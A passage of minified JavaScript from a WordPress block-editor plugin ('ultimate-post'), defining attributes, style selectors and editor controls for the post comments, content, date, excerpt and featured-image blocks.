{{ULTP}} .comment-body .reply, \n          {{ULTP}} .comment-body > p"}]},replySeparator:{type:"boolean",default:!0,style:[{depends:[{key:"replySeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-comment-reply > li:after { display: block }"},{depends:[{key:"replySeparator",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-builder-comment-reply > li:after { display: none }"}]},replySepColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"replySeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-comment-reply > li:after { background-color:{{replySepColor}} }"}]},replyCancelColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .comment-reply-title a { color:{{replyCancelColor}} !important;  }"}]},replyCancelHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .comment-reply-title a:hover { color:{{replyCancelHoverColor}} !important;  }"}]},replySepSpace:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"replySeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-comment-reply > li:after { margin:{{replySepSpace}} 0px }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},11182:(e,t,l)=>{"use strict";var o=l(67294),a=l(44473),i=l(34701),n=l(50540);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/comments.svg",alt:"Post Comments"}),attributes:i.Z,edit:a.Z,save:()=>null})},65657:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,name:l,attributes:u,clientId:d,className:m,attributes:{blockId:g,advanceId:y,showCap:b,currentPostId:v}}=e,h={setAttributes:t,name:l,attributes:u,clientId:d};(0,n.S)({blockId:g,clientId:d,currentPostId:v,setAttributes:t,checkRef:!1}),g&&(0,i.Kh)(u,"ultimate-post/post-content",g);const f=p({className:`ultp-block-${g} ${m}`,...y&&{id:y}});return(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"toggle",key:"showCap",label:__("Enable Drop Cap","ultimate-post")}},{data:{type:"toggle",key:"inheritWidth",label:__("Inherit Default Width","ultimate-post")}},{data:{type:"range",key:"contentWidth",step:1,responsive:!0,unit:!0,min:0,max:1e3,label:__("Content Width","ultimate-post")}},{data:{type:"color",key:"descColor",label:__("Text Color","ultimate-post")}},{data:{type:"color",key:"linkColor",label:__("Link Color","ultimate-post")}},{data:{type:"typography",key:"descTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"contentAlign",responsive:!0,label:__("Alignment","ultimate-post"),options:["0 auto 0 0","0 auto","0 0 0 auto"]}}],store:h}),b&&(0,o.createElement)(a.T,{title:__("Drop Cap Style","ultimate-post"),include:[{data:{type:"range",key:"firstCharSize",min:1,max:200,label:__("First Latter Size","ultimate-post")}},{data:{type:"range",key:"firstCharYSpace",min:1,max:300,label:__("Vertical Space","ultimate-post")}},{data:{type:"range",key:"firstCharXSpace",min:1,max:300,label:__("Horizontal Space","ultimate-post")}},{data:{type:"color",key:"firstLatterColor",label:__("Color","ultimate-post")}}],store:h})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:h}),(0,o.createElement)(a.Mg,{pro:!0,store:h}),(0,o.createElement)(a.iv,{store:h}))),(0,a.dH)()),(0,o.createElement)("div",f,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-content"},(0,o.createElement)("p",null,__("Lorem ipsum dolor sit amet, consectetur adipiscing elit. In eget faucibus enim. Vivamus ac dui euismod velit convallis consequat. Aliquam eget malesuada nisi. Etiam mauris neque, varius vel blandit non, imperdiet facilisis eros. Aliquam ac odio id mi cursus posuere. Nunc in ex nec justo iaculis sodales. Donec ullamcorper sem non metus eleifend, sed molestie urna egestas. Vestibulum gravida mattis varius. Vivamus nec nulla mi. Nulla varius quam in lorem molestie posuere.","ultimate-post")),(0,o.createElement)("h2",null,__("Heading 2","ultimate-post")),(0,o.createElement)("h3",null,__("Heading 3","ultimate-post")),(0,o.createElement)("h4",null,__("Heading 4","ultimate-post")),(0,o.createElement)("h5",null,__("Heading 5","ultimate-post")),(0,o.createElement)("h6",null,__("Heading 6","ultimate-post")),(0,o.createElement)("h3",null,__("Ordered List","ultimate-post")),(0,o.createElement)("ol",null,(0,o.createElement)("li",null,__("List Item 1","ultimate-post")),(0,o.createElement)("li",null,__("List Item 2","ultimate-post")),(0,o.createElement)("li",null,__("List Item 3","ultimate-post"))),(0,o.createElement)("h3",null,__("Unordered List","ultimate-post")),(0,o.createElement)("ul",null,(0,o.createElement)("li",null,__("List Item 1","ultimate-post")),(0,o.createElement)("li",null,__("List Item 2","ultimate-post")),(0,o.createElement)("li",null,__("List Item 3","ultimate-post")))))))}},55784:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},inheritWidth:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} > .ultp-block-wrapper .ultp-builder-content { margin:0 auto; max-width: 700px; width:100%;}"}]},contentWidth:{type:"object",default:{lg:"",ulg:"px"},style:[{depends:[{key:"inheritWidth",condition:"!=",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper .ultp-builder-content {margin: 0 auto; max-width:{{contentWidth}}; width:100%}"}]},descColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} >  .ultp-block-wrapper .ultp-builder-content, {{ULTP}} > .ultp-block-wrapper .ultp-builder-content p {color:{{descColor}} ;}"}]},linkColor:{type:"string",default:"",style:[{selector:"{{ULTP}} >  .ultp-block-wrapper .ultp-builder-content a, {{ULTP}} >  .ultp-block-wrapper .ultp-builder-content * a {color:{{linkColor}} ;}"}]},descTypo:{type:"object",default:{openTypography:0,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{selector:"{{ULTP}} > .ultp-block-wrapper .ultp-builder-content, html :where(.editor-styles-wrapper) {{ULTP}} > .ultp-block-wrapper .ultp-builder-content p"}]},contentAlign:{type:"string",default:"0 auto",style:[{depends:[{key:"inheritWidth",condition:"!=",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper .ultp-builder-content {margin:{{contentAlign}} }"}]},showCap:{type:"boolean",default:!1},firstCharSize:{type:"string",default:"110",style:[{depends:[{key:"showCap",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-builder-content > p:first-child::first-letter {font-size:{{firstCharSize}}px;float:left;}"}]},firstCharXSpace:{type:"string",default:"25",style:[{depends:[{key:"showCap",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-builder-content > p:first-child::first-letter {margin-right:{{firstCharXSpace}}px;}"}]},firstCharYSpace:{type:"string",default:"100",style:[{depends:[{key:"showCap",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-builder-content > p:first-child::first-letter {line-height:{{firstCharYSpace}}px;}"}]},firstLatterColor:{type:"string",default:"",style:[{depends:[{key:"showCap",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-builder-content > p:first-child::first-letter {color:{{firstLatterColor}};}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},13427:(e,t,l)=>{"use strict";var o=l(67294),a=l(65657),i=l(55784),n=l(59943);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/content.svg",alt:"Post Content"}),attributes:i.Z,edit:a.Z,save:()=>null})},43424:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element,{dateI18n:d}=wp.date;function m(e){const{setAttributes:t,name:l,attributes:m,clientId:g,className:y,attributes:{blockId:b,advanceId:v,metaDateFormat:h,metaDateIconShow:f,metaDateIconStyle:k,prefixEnable:w,datePubLabel:x,dateUpLabel:T,dateFormat:_,currentPostId:C}}=e,E={setAttributes:t,name:l,attributes:m,clientId:g};(0,s.S)({blockId:b,clientId:g,currentPostId:C,setAttributes:t,checkRef:!1}),b&&(0,n.Kh)(m,"ultimate-post/post-date-meta",b);const S=c({className:`ultp-block-${b} ${y}`,...v&&{id:v}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",initialOpen:!0,include:[{data:{type:"group",key:"dateFormat",justify:!0,options:[{label:"Publish Date",value:"publish"},{label:"Updated Date",value:"updated"}],responsive:!1,label:__("Date/Time Format","ultimate-post")}},{data:{type:"toggle",key:"prefixEnable",label:__("Prefix Enable","ultimate-post")}},{data:{type:"text",key:"datePubLabel",label:__("Prefix Published Label","ultimate-post")}},{data:{type:"text",key:"dateUpLabel",label:__("Prefix Update Label","ultimate-post")}},{data:{type:"select",key:"metaDateFormat",label:__("Date/Time Format","ultimate-post"),options:[{value:"M j, Y",label:"Feb 7, 2022"},{value:"default_date",label:"WordPress Default Date Format",pro:!0},{value:"default_date_time",label:"WordPress Default Date & Time Format",pro:!0},{value:"g:i A",label:"1:12 PM",pro:!0},{value:"F j, Y",label:"February 7, 2022",pro:!0},{value:"F j, Y g:i A",label:"February 7, 2022 1:12 PM",pro:!0},{value:"M j, Y g:i A",label:"Feb 7, 2022 1:12 PM",pro:!0},{value:"j M Y",label:"7 Feb 2022",pro:!0},{value:"j M Y g:i A",label:"7 Feb 2022 1:12 PM",pro:!0},{value:"j F Y",label:"7 February 2022",pro:!0},{value:"j F Y g:i A",label:"7 February 2022 1:12 PM",pro:!0},{value:"j. M Y",label:"7. Feb 2022",pro:!0},{value:"j. M Y | H:i",label:"7. Feb 2022 | 1:12",pro:!0},{value:"j. F Y",label:"7. February 2022",pro:!0},{value:"j.m.Y",label:"7.02.2022",pro:!0},{value:"j.m.Y g:i A",label:"7.02.2022 1:12 PM",pro:!0}]}},{data:{type:"color",key:"metaDateColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"metaDateTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"metaDateCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post")}},{data:{type:"color",key:"datePrefixColor",label:__("Prefix Color","ultimate-post")}},{data:{type:"range",key:"datePrefixSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Prefix label Space X","ultimate-post")}}],store:E}),(0,o.createElement)(i.T,{title:__("Icon","ultimate-post"),depend:"metaDateIconShow",include:[{data:{type:"icon",key:"metaDateIconStyle",label:__("Select Icon","ultimate-post")}},{data:{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")}},{data:{type:"range",key:"metaDateIconSize",min:0,max:100,responsive:!0,step:1,unit:["px","em","rem"],label:__("Icon Size","ultimate-post")}},{data:{type:"range",key:"metaDateIconSpace",min:0,max:100,responsive:!0,step:1,unit:["px","em","rem"],label:__("Icon Space X","ultimate-post")}}],store:E})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:E}),(0,o.createElement)(i.Mg,{pro:!0,store:E}),(0,o.createElement)(i.iv,{store:E}))),(0,i.dH)()),(0,o.createElement)("div",S,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-date-meta"},w&&(0,o.createElement)("span",{className:"ultp-date-meta-prefix"},"publish"==_&&x,"updated"==_&&T),f&&(0,o.createElement)("span",{className:"ultp-date-meta-icon"},""!=k&&a.ZP[k]),h&&(0,o.createElement)("span",{className:"ultp-date-meta-format"},d((0,i.De)(h)))))))}},18715:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},prefixEnable:{type:"boolean",default:!1},metaDateIconShow:{type:"boolean",default:!0},dateFormat:{type:"string",default:"updated"},metaDateFormat:{type:"string",default:"M j, Y"},metaDateColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-date-meta-format { color:{{metaDateColor}} }"}]},metaDateTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-date-meta"}]},metaDateCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-block-wrapper { text-align: {{metaDateCountAlign}};}"}]},datePubLabel:{type:"string",default:"Publish Date",style:[{depends:[{key:"prefixEnable",condition:"==",value:!0},{key:"dateFormat",condition:"==",value:"publish"}]}]},dateUpLabel:{type:"string",default:"Updated Date",style:[{depends:[{key:"prefixEnable",condition:"==",value:!0},{key:"dateFormat",condition:"==",value:"updated"}]}]},datePrefixColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"prefixEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-prefix { color:{{datePrefixColor}} }"}]},datePrefixSpace:{type:"object",default:{lg:"12",unit:"px"},style:[{depends:[{key:"prefixEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-prefix { margin-right: {{datePrefixSpace}} }"}]},metaDateIconStyle:{type:"string",default:"date1",style:[{depends:[{key:"metaDateIconShow",condition:"==",value:!0}]}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"metaDateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-icon > svg { color:{{iconColor}}; color:{{iconColor}};}"}]},metaDateIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"metaDateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-icon svg { width:{{metaDateIconSize}}; height:{{metaDateIconSize}} }"}]},metaDateIconSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"metaDateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-icon > svg { margin-right: {{metaDateIconSpace}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},68425:(e,t,l)=>{"use strict";var o=l(67294),a=l(43424),i=l(18715),n=l(39180);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/post_date.svg",alt:"Post Date Meta"}),attributes:i.Z,edit:a.Z,save:()=>null})},25260:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,name:l,attributes:u,clientId:d,className:m,attributes:{blockId:g,advanceId:y,excerptLimit:b,currentPostId:v}}=e,h={setAttributes:t,name:l,attributes:u,clientId:d};(0,n.S)({blockId:g,clientId:d,currentPostId:v,setAttributes:t,checkRef:!1}),g&&(0,i.Kh)(u,"ultimate-post/post-excerpt",g);const f=p({className:`ultp-block-${g} ${m}`,...y&&{id:y}});let k="Dummy excerpt text sample excerpt text. Dummy excerpt text sample excerpt text.";return b&&(k=k.split(" ").splice(0,b).join(" ")),(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"color",key:"excerptColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"excerptTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",min:0,max:200,key:"excerptLimit",label:__("Excerpt Limit(Word)","ultimate-post")}},{data:{type:"alignment",key:"excerptAlignment",responsive:!0,label:__("Alignment","ultimate-post")}}],store:h})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:h}),(0,o.createElement)(a.Mg,{pro:!0,store:h}),(0,o.createElement)(a.iv,{store:h}))),(0,a.dH)()),(0,o.createElement)("div",f,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-excerpt"},k))))}},11195:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-builder-excerpt {color:{{excerptColor}}}"}]},excerptTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-builder-excerpt"}]},excerptLimit:{type:"string",default:"150"},excerptAlignment:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-builder-excerpt {text-align:{{excerptAlignment}}}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},86303:(e,t,l)=>{"use strict";var o=l(67294),a=l(25260),i=l(11195),n=l(34776);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/excerpt.svg"}),attributes:i.Z,edit:a.Z,save:()=>null})},8790:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,name:l,attributes:u,clientId:d,className:m,attributes:{blockId:g,advanceId:y,altText:b,enableCaption:v,currentPostId:h}}=e,f={setAttributes:t,name:l,attributes:u,clientId:d};(0,n.S)({blockId:g,clientId:d,currentPostId:h,setAttributes:t,checkRef:!1}),g&&(0,i.Kh)(u,"ultimate-post/post-featured-image",g);const k=p({className:`ultp-block-${g} ${m}`,...y&&{id:y}});return(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"image",title:__("Image","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:0,data:{type:"toggle",key:"defImgShow",help:__("When both an image and a video exist, prioritize displaying the image","ultimate-post"),label:__("Show Image","ultimate-post")}},{position:5,data:{type:"text",key:"altText",label:__("Image ALT text","ultimate-post")}},{position:10,data:{type:"range",key:"imgWidth",min:0,max:1e3,step:1,responsive:!0,unit:!0,label:__("Image Width","ultimate-post")}},{position:12,data:{type:"range",key:"imgHeight",min:0,max:1e3,step:1,responsive:!0,unit:!0,label:__("Image Height","ultimate-post")}},{position:13,data:{type:"group",key:"imgScale",justify:!0,options:[{value:"cover",label:__("Cover","ultimate-post")},{value:"contain",label:__("Container","ultimate-post")},{value:"fill",label:__("Fill","ultimate-post")}],label:__("Image Scale","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:14,data:{type:"range",key:"imgRadius",min:0,max:1e3,step:1,responsive:!0,unit:!0,label:__("Image Border Radius","ultimate-post")}},{position:15,data:{type:"alignment",key:"imgAlign",responsive:!0,label:__("Image Alignment","ultimate-post"),options:["start","center","end"]}},{position:16,data:{type:"select",key:"imgCrop",help:"Image Size Working Only Frontend",label:__("Image Size","ultimate-post"),options:a.gs}},{position:17,data:{type:"toggle",key:"imgSrcset",label:__("Enable Srcset","ultimate-post")}}],store:f}),(0,o.createElement)(a.T,{title:__("Enable Dynamic Caption","ultimate-post"),depend:"enableCaption",include:[{position:1,data:{type:"color",key:"captionColor",label:__("Caption Color","ultimate-post")}},{position:2,data:{type:"color",key:"captionHoverColor",label:__("Caption Hover Color","ultimate-post")}},{position:3,data:{type:"typography",key:"captionTypo",label:__("Caption Typography","ultimate-post")}},{position:4,data:{type:"alignment",key:"captionAlign",disableJustify:!0,label:__("Caption Alignment","ultimate-post")}},{position:5,data:{type:"range",key:"captionSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Caption Space","ultimate-post")}}],store:f})),(0,o.createElement)(r.Section,{slug:"video",title:__("Video","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:__("Video Setting","ultimate-post"),include:[{position:0,data:{type:"range",key:"videoWidth",label:__("Video Width","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:1,data:{type:"range",key:"videoHeight",label:__("Max Video Height","ultimate-post"),min:0,max:1500,step:1,unit:!0,responsive:!0}},{position:2,data:{type:"alignment",key:"vidAlign",disableJustify:!0,label:__("Video Alignment","ultimate-post")}},{position:17,data:{type:"toggle",key:"enableVideoCaption",label:__("Video Caption Enable","ultimate-post")}},{position:3,data:{type:"toggle",key:"stickyEnable",pro:!0,label:__("On Scroll Sticky Enable","ultimate-post")}},{position:4,data:{type:"range",key:"stickyWidth",label:__("Sticky Video Width","ultimate-post"),min:0,max:1500,step:1,responsive:!0}},{position:6,data:{type:"select",key:"stickyPosition",options:[{label:"Bottom Right",value:"bottomRight"},{label:"Bottom Left",value:"bottomLeft"},{label:"Top Right",value:"topRight"},{label:"Top Left",value:"topLeft"}],label:__("Sticky Video Position","ultimate-post")}},{position:7,data:{type:"range",key:"flexiblePosition",label:__("Flexible Sticky Position","ultimate-post"),min:0,max:500,step:1,unit:!0,responsive:!0}},{position:8,data:{type:"color",key:"stickyBg",label:__("Background","ultimate-post")}},{position:9,data:{type:"border",key:"stickyBorder",label:__("Border","ultimate-post")}},{position:10,data:{type:"boxshadow",key:"stickyBoxShadow",label:__("BoxShadow","ultimate-post")}},{position:12,data:{type:"dimension",key:"stickyPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:13,data:{type:"separator",label:__("Close Button Style","ultimate-post")}},{position:14,data:{type:"range",key:"stickyCloseSize",label:__("Sticky Close Size","ultimate-post")}},{position:15,data:{type:"color",key:"stickyCloseColor",label:__("Sticky Close Color","ultimate-post")}},{position:16,data:{type:"color",key:"stickyCloseBg",label:__("Close Background Color","ultimate-post")}}],store:f})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:f}),(0,o.createElement)(a.Mg,{pro:!0,store:f}),(0,o.createElement)(a.iv,{store:f}))),(0,a.dH)()),(0,o.createElement)("div",k,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-image-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-image"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/ultp-placeholder.jpg",alt:b||"Image"}))),v&&(0,o.createElement)("div",{className:"ultp-featureImg-caption"},"Dynamic Image Caption"))))}},10577:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},defImgShow:{type:"boolean",default:!1},altText:{type:"string",default:"Image"},imgWidth:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image img {height: {{imgHeight}}; }"}]},imgRadius:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-image img { border-radius:{{imgRadius}}; }"}]},imgScale:{type:"string",default:"cover",style:[{depends:[{key:"imgScale",condition:"==",value:"cover"}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image img { object-fit: cover }"},{depends:[{key:"imgScale",condition:"==",value:"contain"}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image img { object-fit: contain }"},{depends:[{key:"imgScale",condition:"==",value:"fill"}],selector:"{{ULTP}} .ultp-block-wrapper .ultp-builder-image img { object-fit: fill }"}]},imageScale:{type:"string",default:"cover",style:[{selector:"{{ULTP}} .ultp-builder-video {object-fit: {{imageScale}};}"}]},imgAlign:{type:"object",default:{lg:"left"},style:[{selector:"{{ULTP}} .ultp-image-wrapper:has(.ultp-builder-image) {display: flex; justify-content:{{imgAlign}}; text-align: {{imgAlign}}; } "}]},imgCrop:{type:"string",default:"full"},imgSrcset:{type:"boolean",default:!1},enableCaption:{type:"boolean",default:!1},captionColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-featureImg-caption { color: {{captionColor}}; }"}]},captionHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-featureImg-caption:hover { color: {{captionHoverColor}}; } "}]},captionTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-featureImg-caption"}]},captionAlign:{type:"string",default:"center",style:[{selector:"{{ULTP}} .ultp-featureImg-caption { text-align:{{captionAlign}} }"}]},captionSpace:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-featureImg-caption { margin-top:{{captionSpace}}; }"}]},enableVideoCaption:{type:"boolean",default:!1},videoWidth:{type:"object",default:{lg:"100"},style:[{selector:"{{ULTP}} .ultp-builder-video:has( video ), {{ULTP}} .ultp-embaded-video {width:{{videoWidth}}%;}"}]},videoHeight:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-video video, {{ULTP}} .ultp-builder-video .ultp-embaded-video {max-height:{{videoHeight}}; height: 100%;}"}]},vidAlign:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-image-wrapper:has( .ultp-embaded-video ) { text-align:{{vidAlign}}; } {{ULTP}} .ultp-image-wrapper:has( .ultp-video-html ) {  display: flex; justify-content:{{vidAlign}}; }"}]},stickyEnable:{type:"boolean",default:!1},stickyWidth:{type:"object",default:{lg:"450"},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active {width:{{stickyWidth}}px !important;}"}]},stickyPosition:{type:"string",default:"bottomRight",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"bottomRight"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { bottom: 0px; right: 20px; }"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"bottomLeft"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { bottom: 0px; left: 20px; }"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"topRight"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { top: 0px; right: 20px;; }"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"topLeft"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { top: 0px; left: 20px; }"}]},flexiblePosition:{type:"object",default:{lg:"15",ulg:"px",unit:"px"},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"bottomRight"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { bottom:{{flexiblePosition}}!important;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active {display: flex; justify-content: center; align-items: center;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"bottomLeft"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { bottom:{{flexiblePosition}} !important;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"topRight"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { top:{{flexiblePosition}} !important;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"topLeft"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { top:{{flexiblePosition}}!important;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"rightMiddle"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { display: flex; justify-content: flex-end; align-items: center;}"},{depends:[{key:"stickyEnable",condition:"==",value:!0},{key:"stickyPosition",condition:"==",value:"leftMiddle"}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { display: flex; justify-content: flex-start; align-items: center; }"}]},stickyBg:{type:"string",default:"#000",style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active { background:{{stickyBg}} }"}]},stickyBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sticky-video.ultp-sticky-active"}]},stickyBoxShadow:{type:"object",default:{openShadow:1,width:{top:0,right:0,bottom:24,left:1},color:"#000000e6"},style:[{depends:[{key:"stickyEnable",condition:"==",value:!0}],selector:"{{ULTP}} 